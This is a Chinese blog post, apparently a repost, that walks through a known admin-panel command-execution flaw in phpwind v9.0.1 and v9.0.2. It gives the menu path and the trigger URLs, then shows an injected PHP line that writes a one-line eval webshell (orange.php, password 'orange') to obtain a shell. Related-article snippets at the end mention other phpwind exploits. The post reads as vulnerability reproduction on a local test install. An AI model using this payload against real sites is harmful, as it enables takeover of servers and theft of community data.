phpwind index.php?m=design&c=api,phpwind v9存在命令执行漏洞(登陆后台)

最新推荐文章于 2024-04-03 09:42:29 发布
最新推荐文章于 2024-04-03 09:42:29 发布
阅读量489 收藏
点赞数
文章标签: phpwind index.php?m=design&c=api

已知漏洞:https://www.seebug.org/vuldb/ssvid-94465

phpwind v9最新版存在命令执行漏洞(登陆后台)

Phpwind_v9.0.2(最新版),phpwind_v9.0.1

命令执行

高危(getshell)

phpwind是一个基于PHP和MySQL的开源社区程序,是国内最受欢迎的通用型论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活需求。Phpwind_v9.0.2(最新版),phpwind_v9.0.1版本登陆后台,调用代码,存在命令执行漏洞,进而getshell。

攻击者可获取网站社区的数据库信息,可发布信息等。

漏洞验证

版本phpwind_v9.0.2,登陆后台,门户-->模块管理-->调用管理-->添加模块,新增模块-->选择自定义html,下一步,写入<?php phpinfo(); ?> ,然后调用代码。

选择调用站外代码xml,复制连接,访问,调用xml,json都可以。去掉xml,会执行phpinfo();

该漏洞出现的文件路径为:软件安装根目录\src\applications\design\controller

\ApiController.php,具体代码位置如下图所示

9c30b8c2bd8aeb0176e04ae20a0da30b.png

默认安装,需要登陆后台

1,本地搭建的环境phpwind_v9.0.2,源码下载(链接: https://pan.baidu.com/s/1J8BaaOEvCDU0O3MyHKgKQQ密码: qrgg)。实验用的是phpwind_v9.0.2环境,phpwind_v9.0.1的方法是一样的(源码下载链接: https://pan.baidu.com/s/1lQpLGChPiKcxhujiLtWp7Q密码: ydj3)。下载好默认安装就好,如果打不开首页,须将.htaccess删除。

2,本地进行实验,默认安装,登陆后台(admin.php)(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/admin.php),门户-->模块管理-->调用管理-->添加模块,新增模块-->选择自定义html,下一步,写入<?php phpinfo(); ?> ,然后调用代码。

8b7cd313a5454c47843018c7c6a06336.png

8569831b7374dfacda04c2f2267161dd.png

12f0206f45f7294e5af9ecd7ae4cc27f.png

a51e5937604eea5c8b12eb4891889d02.png

57515f18176d438ee96739493fad641a.png

3,选择调用站外代,复制连接,访问,调用xml,json都可以。以xml为例(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/index.php?m=design&c=api&token=Y6s5Q0iwMq&id=4&format=xml),

dbb0e678316f690e60f6d95871bda7e2.png

去掉xml,会执行phpinfo

3a01e9a68024aef4a5f7fbd1d486553e.png

c139c76407b0e4e4768699d5cade68ef.png

4,将代码换成(<?php fputs(fopen("orange.php","w"),"<?eval(\$_POST[orange]);?>");?>)

新建一个orange.php文件,将一句话写入orange.php文件。

(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/index.php?m=design&c=api&token=tbB6LdMe6q&id=5&format=xml)

4865cf299b590906b870f76d790a9cdf.png

bb1e352dd36eedb3e4f06535c1c45dc8.png

c1464197499a781c8c75ef59d9e55bed.png

5,(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/orange.php),密码orange

源码下载(链接: https://pan.baidu.com/s/1J8BaaOEvCDU0O3MyHKgKQQ 密码: qrgg)

本文链接(http://www.cnblogs.com/Oran9e/p/8681391.html),转载请注明。

小浪花VG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpwind漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-10 856
phpwind漏洞利用,考虑到PHPWind是国内著名的论坛程序,利用它建站的网站非常多,我顿时来了兴趣,决定看看这个漏洞怎么利用。 看漏洞的名字好像影PHPWind8.0版本,我机子里保存了以前下载的PHPWind v8.0 GBK build 20100810的源程序,在虚拟机里安装后测试漏洞不能利用,换了PHPWindForums v7.5 SP3 GBK整合版漏洞利用成功,可能是我机子中之前的版本比较新的缘故吧。下面就用PHPWind Forums v7.5 SP3 GBK整合版来给大家介绍phpw
phpwind测试实战之phpwind安装(三)
qq_33022105的博客
10-29 546
安装好xampp后,将下载好的phpwind解压后将其文件夹下的upload移动到/opt/lampp/htdocs目录下,使用chmod命令改变upload的权限,
PHPWind大型多用户高速博客个人主页系统
06-22
PHPWind 推出大型多用户博客(BLOG), 该系统以众多个人日志(主页)为内容基础, 为网站内容管理与发布提供了更好的解决方案!<br>(1) 以 .html 为链接模式架设整个网站, 让站点的内容大量出现在各大搜索引擎<br>(2) 全面支持 二级域名 比如 我的个人主页 http://yuling.phpwind.net<br>(3) 做为一个可独立运行的系统, 同时可选择性的与论坛会员及文章数据进行完美整合!<br>(4) 完全支持 RSS, 与 WAP 手机浏览, 用句广告词就是: 手机也能博客!<br>(5) 强大的系统管理, 能简便地进行系统管理与用户日志管理!<br>(6) 采用多层设计, 根分类 -- 多级子分类 -- 系统团队博客 -- 个人团队博客 -- 个人主页 -- 个人专辑<br>(7) 采用phpwind负载核心, 具备流畅的速度与高负载能力!<br>(8) 采用phpwind模版设计思想, 与多语言设计思想! 最大程度地进行扩展与设计!
phpwind升级php7,phpwind8.3版本 个人中心功能强化升级
weixin_35231383的博客
03-10 200
个人中心是社区最古老的组成部分之一,在网站运营过程中一直受到站长们的关注。近几年来,随着sns、微博等社交产品在国内的普及,传统社区中单调的个人中心设计不再符合现今社区网站发展的现状。phpwind最新发布的8.3版本,其个人中心设计可谓旧貌换新颜,功能十分强大。产品架构有利于引入社会化关系,并使得社区的价值内容得到重新梳理及高效传播。一路走来,phpwind始终保持着开放倾听的态度,积极的与各界...
【3】phpwind v9.0.2 后台getshell
司徒荆的博客
06-05 1305
phpwind v9.0.2 后台getshell,进入后台后才可以
PHPWind 发帖回帖Api PHP版打包下载
10-29
PHPWind 的发帖和回帖API是其核心功能的一部分,允许用户通过编程方式与论坛进行交互,实现自动化或半自动化的发帖、回帖操作。这些API通常用于开发插件、集成其他系统或者进行数据迁移等场景。 在提供的部分内容中...
phpwind-admin.rar_php后台_现成网站php_网站后台
09-14
PHPWind 后台管理系统详解】 PHPWind 是一款流行的开源社区建站系统,以其高效、稳定和易用性而受到广大站长的青睐。本资源"phpwind-admin.rar"提供了PHPWind后台管理界面代码,这对于开发者来说是一个很好的...
phpwind9.x如何从数据库更改用户名或者用户ID?共
11-22
可以执行清理缓存的SQL命令,或通过PHPWind后台的缓存管理功能进行。 7. **更新关联数据**:注意,用户名可能在其他表中也有引用,如帖子、回帖等。检查并更新这些关联数据,确保一致性。 **二、更改用户ID** ...
Tencent.rar_PHPWIND7.3.2_TXPTOP_php 树形论坛_substancewod_树形论坛
09-24
功能完整pw树形论坛程序,phpwind7.3.2带采集,带自动顶贴功能。未加密版。 (Full-featured program pw tree forum, phpwind7.3.2 with acquisition, with automatic top posted functionality. Unencrypted version...
迅如疾风 PHPWind 6.3.2 测试手记
01-11 587
核心提示:PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。   源码压缩包刚到手的时候,2.87M,作为一个WEB程序,这样的容量可算是够大的,解压缩后目录也达到了8.74M,不过当看到PW默认自带了多个风格以及有相对比较完整的IP库时(并没有使用常见的纯真IP库,而是象以前一样根据IP头分割的TXT文件),也就理解了目录如此庞大的原因。对于如今的网络速度而言,下载3M左右
phpwind本地部署完整包
02-09
phpwind是一个比较成熟的论坛框架,网上都有如何在远程空间中部署phpwind,但很少有在本地部署操作介绍的,本地搭建PHPWIND论坛在我的博客中有写,这里我将会用到的所有包打成完整包上传为附件,帮助大家简单方便的在本地部署phpwind,并可以结合自己的项目工程将环境嵌入。
PHPWIND9.0 二次开发官方文档DOC整理版
01-25
PHPWIND9.0 二次开发官方文档DOC整理版最新版.. PHPWind v3.0进一步改进系统底层架构,极大提高了系统负载能力和稳定性,降低系统资源的消耗,让论坛在高压力环境下保持快速、稳定的数据运行,保障论坛的正常运行
phpwind 安装教程图文说明
jazywoo_在路上
08-14 6009
第一步,确定你的空间支持程序运行(mysql+PHP) 没有环境的童鞋可以用集成包 第二步,选择合适的版本下载 我们提供了三种不同的编码。包括 GBK 简体中文版(推荐)、繁体中文版、UTF-8中文版,请根据您所需的编码,选择相应版本的论坛程序下载。 第三步,解压并上传论坛程序到论坛根目录下 1、解压后得到如下图所示的两个文件:idocs目录为用户使用相关文档及最新版的功能更新说明、up
php9.0论坛搭建默认,phpwind9.0
weixin_35672450的博客
03-20 615
phpwind9.0是一个基于基于PHP和MySQL的开源社区程序,同时也是国内最受欢迎的通用型论坛程序之一。主要的国内就是帮助用户快速搭建论坛以及社区网站。phpwind9.0的论坛系统具有多重的功能和特点;包括phpwind9.0具备着多重子版块,同时用户可以自由组合后台用户组权限。此外,phpwind9.0还具备分版块控制生成html页面、可选用的所见即所得编辑器、防止图片和附件防盗链、多附...
php 技术亮点,功能全面升级 phpwind8.3 后台亮点图文详解
weixin_42388176的博客
03-10 506
phpwind8.3延续了8.0版本在电子商务开放服务及程序效率方面的良好口碑,在phpwind研发人员经过了一年的技术准备及数月的封闭开发后,秉持“倾听 无距离”的精神,广泛吸纳来自站长的声音,推出的更注重细节体验、速度更快、运行更为稳定的版本。新版本在细节体验方面的改善达到120余处,并有10余项技术创新及400余项的优化和修复,使产品性能及负载更为稳定和轻盈。phpwind 8.3版本后台相...
php wamp一键环境包,phpwind本地环境一键安装包Wamp 5.0使用说明
weixin_31775717的博客
03-20 438
保存PHPWind Wamp 5.0 安装使用说明一 PHPWind Wamp 5.0 产品介绍也许您正在为架设论坛的烦琐步骤而苦恼,也许您正为架设社区环境而感到困惑。那么现在,phpwind请您放心,您的这些困惑苦恼,phpwind为您解决。为了PHPWind爱好者和使用者能更简单、快捷的架设自己的论坛,我们推出最新产品---PHPWind Wamp。PHPWind Wamp不仅能够自动在您本...
phpwindexp.php,phpwind 7.5 0day漏洞利用 (EXP发布)
weixin_39912163的博客
03-22 785
phpwind 7.5 Multiple Include Vulnerabilities一.api/class_base.php本地包含漏洞1.描叙api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base.php文件里:function callback($mode, $met...
推荐开源项目:PHPWind - 阿里巴巴打造的高效能社区框架
最新发布
gitblog_00068的博客
04-03 372
推荐开源项目:PHPWind - 阿里巴巴打造的高效能社区框架 项目地址:https://gitcode.com/alibaba/phpwind PHPWind 是阿里巴巴集团开发的一个基于PHP的社区软件平台,旨在为开发者提供一个高性能、易扩展的基础架构,用于构建各类社交网络和互动社区应用。 项目简介 PHPWind 是一款历史悠久的开源社区系统,自2005年起就开始服务于全球数以万计的网站。其...
php最大的论坛,phpwind论坛史上最大漏洞 -电脑资料
weixin_31131927的博客
03-12 941
发表于家用电脑2007年第19期文/图:飘忽不定就在最近的一个月,国内的一些著名论坛相继被黑,而这些论坛采用的基本都是PHPwind论坛系统,管理员密码,而入侵的过程仅仅只需要十几秒种。截至目前,国内大约有1/3采用PHPwind论坛程序的网站被黑,无数网站被恶意挂马、篡改甚至直接删除数据。而目前,网络上仍然存在不少没有填补该漏洞的网站。本文将为大家揭开此次事件的真相,并给广大站长以及个人建站爱好...
PHPWind 源码解析.docx
03-01
"PHPWind 源码解析" PHPWind 是一款流行的开源社区论坛软件,它的源码解析文档主要关注了 `global.php` 文件及其相关的源码。这份文档是由用户 claudedb 在霏凡论坛原创分享的,目的是帮助读者理解 PHPWind 4.3....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值